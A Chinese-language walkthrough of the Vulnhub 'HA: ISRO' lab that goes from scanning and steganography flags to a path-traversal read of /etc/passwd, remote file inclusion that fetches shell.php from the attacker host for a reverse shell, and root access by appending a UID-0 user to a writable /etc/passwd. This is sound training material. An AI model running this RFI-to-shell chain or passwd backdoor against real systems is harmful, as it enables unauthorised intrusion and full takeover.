Vulnhub之Isro靶机详细测试过程以及经验教训
Isro
作者:jason_huawen
靶机信息
名称:HA: ISRO
地址:
https://www.vulnhub.com/entry/ha-isro,376/
识别目标主机IP地址
(root💀kali)-[~/Vulnhub/Isro]
└─# netdiscover -i eth1 -r 192.168.187.0/24
Currently scanning: 192.168.187.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.187.1 00:50:56:c0:00:01 1 60 VMware, Inc.
192.168.187.139 00:0c:29:eb:ac:e1 1 60 VMware, Inc.
192.168.187.254 00:50:56:fd:07:6a 1 60 VMware, Inc.
利用kali linux自带的netdiscover工具识别目标主机IP地址为192.168.187.139
NMAP扫描
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# nmap -sS -sV -sC -p- 192.168.187.139 -oN nmap_full_scan 130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2023-02-23 21:42 EST
Nmap scan report for localhost (192.168.187.139)
Host is up (0.0017s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:d2:c5:ec:a5:f9:c4:f3:8a:70:f6:df:ac:ad:a9:24 (RSA)
| 256 34:ae:7a:6f:94:93:25:de:39:e3:14:b0:61:80:34:54 (ECDSA)
|_ 256 5e:52:99:70:f4:d1:c0:f6:6e:62:30:94:ee:47:be:59 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: ISRO - Govenment of India
|_http-server-header: Apache/2.4.29 (Ubuntu)
65534/tcp open ftp vsftpd 3.0.3
MAC Address: 00:0C:29:EB:AC:E1 (VMware)
Service Info: OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.47 seconds
NMAP扫描结果表明目标主机有3个开放端口:22(SSH)、80(http)、65534(FTP)
获得Shell
──(root💀kali)-[~/Vulnhub/Isro]
└─# ftp 192.168.187.139 65534
Connected to 192.168.187.139.
220 (vsFTPd 3.0.3)
Name (192.168.187.139:root): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
Login failed.
ftp> quit
221 Goodbye.
目标主机不允许匿名访问。
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# nikto -h http://192.168.187.139
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.187.139
+ Target Hostname: 192.168.187.139
+ Target Port: 80
+ Start Time: 2023-02-23 21:46:23 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 16e3, size: 593fe0a9b796d, mtime: gzip
+ Allowed HTTP Methods: OPTIONS, HEAD, GET, POST
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 9 item(s) reported on remote host
+ End Time: 2023-02-23 21:47:36 (GMT-5) (73 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# gobuster dir -u http://192.168.187.139 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.187.139
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html,sh,txt
[+] Timeout: 10s
===============================================================
2023/02/23 21:48:24 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 5859]
/img (Status: 301) [Size: 316] [--> http://192.168.187.139/img/]
/connect.php (Status: 200) [Size: 0]
/server-status (Status: 403) [Size: 280]
/img目录下有一个jpg格式的图片,下载到本地进行分析:
┌──(root💀kali)-[~/Desktop]
└─# cd ~/Vulnhub/Isro
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# ls
aryabhata.jpg nmap_full_scan
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# steghide extract -sf aryabhata.jpg
Enter passphrase:
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# stegseek aryabhata.jpg 130 ⨯
StegSeek 0.6 - https://github.com/RickdeJager/StegSeek
[i] Found passphrase: ""
[i] Original filename: "flag.txt".
[i] Extracting to "aryabhata.jpg.out".
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# ls
aryabhata.jpg aryabhata.jpg.out nmap_full_scan
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# cat aryabhata.jpg.out
Aryabhata Flag:{e39cf1cbb00f09141259768b6d4c63fb}
┌──(root💀kali)-[~/Vulnhub/Isro]
└─#
访问url
http://192.168.187.139/bhaskara.html
返回页面源代码中有注释:
/p>
</div>
<!-- End Page Content -->
</div>
<!-- Footer -->
<!--BHASKARA LAUNCH CODE: L2JoYXNrYXJh -->
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# echo 'L2JoYXNrYXJh' | base64 -d
/bhaskara
解码得到一个目录,访问该目录
──(root💀kali)-[~/Vulnhub/Isro]
└─# ls
aryabhata.jpg aryabhata.jpg.out bhaskara nmap_full_scan
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# file bhaskara
bhaskara: data
用last命令读取
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# wfuzz -u http://192.168.187.139/connect.php?FUZZ=id -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 0
无果
换一个payload
──(root💀kali)-[~/Vulnhub/Isro]
└─# wfuzz -u http://192.168.187.139/connect.php?FUZZ=../../../../../etc/passwd -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 0
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.187.139/connect.php?FUZZ=../../../../../etc/passwd
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000759: 200 28 L 38 W 1455 Ch "file"
这个例子告诉我们,在测试LFI漏洞时有些时候可以使命令比如ID,有些时候是文件名称
──(root💀kali)-[~/Vulnhub/Isro]
└─# curl http://192.168.187.139/connect.php?file=../../../../../etc/passwd 130 ⨯
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
isro:x:1000:1000:isro,,,:/home/isro:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
ftp:x:107:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
mysql:x:108:115:MySQL Server,,,:/nonexistent:/bin/false
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# curl http://192.168.187.139/connect.php?file=../../../../../home/isro/.ssh/id_rsa
不存在私钥文件。
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# curl curl http://192.168.187.139/connect.php?file=http://192.168.187.130:8000/test.txt
curl: (6) Could not resolve host: curl
jason,hello
存在远程文件包含漏洞,那接下来就设法获得反弹shell
http://192.168.187.139/connect.php?file=http://192.168.187.130:8000/shell.php
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# curl http://192.168.187.139/connect.php?file=http://192.168.187.130:8000/shell.php
┌──(root💀kali)-[~/Vulnhub/Isro]
└─# nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.187.130] from (UNKNOWN) [192.168.187.139] 33540
Linux ubuntu 4.15.0-55-generic #60-Ubuntu SMP Tue Jul 2 18:22:20 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
19:18:17 up 43 min, 0 users, load average: 0.00, 0.08, 0.41
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/$
提权
将linpeas.sh脚本上传至目标主机/tmp目录,修改权限,并执行脚本:
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ /etc/passwd is writable
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
创建密码,并将其加入到/etc/passwd中:
www-data@ubuntu:/tmp$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:109::/run/uuidd:/usr/sbin/nologin
isro:x:1000:1000:isro,,,:/home/isro:/bin/bash
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
ftp:x:107:114:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
mysql:x:108:115:MySQL Server,,,:/nonexistent:/bin/false
www-data@ubuntu:/tmp$ echo 'jason:$6$jjjjj$0KKGbTLponj9XtFgmJfh1TryElTSBf8UXtC9zwMHyJCtycfeT0nCo3F2pzOQzqLMqmK1uLjdQKLzgXXGfeRzH1:0:0:root:/root:/bin/bash' >> /etc/passwd
<gXXGfeRzH1:0:0:root:/root:/bin/bash' >> /etc/passwd
www-data@ubuntu:/tmp$ su - jason
su - jason
Password: 123456
root@ubuntu:~# cd /root
cd /root
root@ubuntu:~# ls -alh
ls -alh
total 24K
drwx------ 3 root root 4.0K Oct 3 2019 .
drwxr-xr-x 22 root root 4.0K Oct 1 2019 ..
-rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc
-rw-r--r-- 1 root root 956 Oct 3 2019 final.txt
drwxr-xr-x 3 root root 4.0K Oct 1 2019 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
root@ubuntu:~# cat final.txt
cat final.txt
8888888 .d8888b. 8888888b. .d88888b.
888 d88P Y88b 888 Y88b d88P" "Y88b
888 Y88b. 888 888 888 888
888 "Y888b. 888 d88P 888 888
888 "Y88b. 8888888P" 888 888
888 "888 888 T88b 888 888
888 d8b Y88b d88P d8b 888 T88b d8b Y88b. .d88P
8888888 Y8P "Y8888P" Y8P 888 T88b Y8P "Y88888P"
Chandrayaan Flag:{0ad8d59efe7ce5c820aa7350a5d708b2}
!! Congrats you have finished this task !!
Contact us here:
Hacking Articles : https://twitter.com/rajchandel/
Aarti: https://in.linkedin.com/in/aarti-singh-353698114
+-+-+-+-+-+ +-+-+-+-+-+-+-+
|E|n|j|o|y| |H|A|C|K|I|N|G|
+-+-+-+-+-+ +-+-+-+-+-+-+-+
____________________________________
root@ubuntu:~#
经验教训
- 在第一次看到connect.php文件时,就感觉这是突破口,但是用wfuzz FUZZ了一下参数,但是载荷处为id,没有跑出结果,此时应该再试一下../../../../etc/passwd
STRIVE FOR PROGRESS,NOT FOR PERFECTION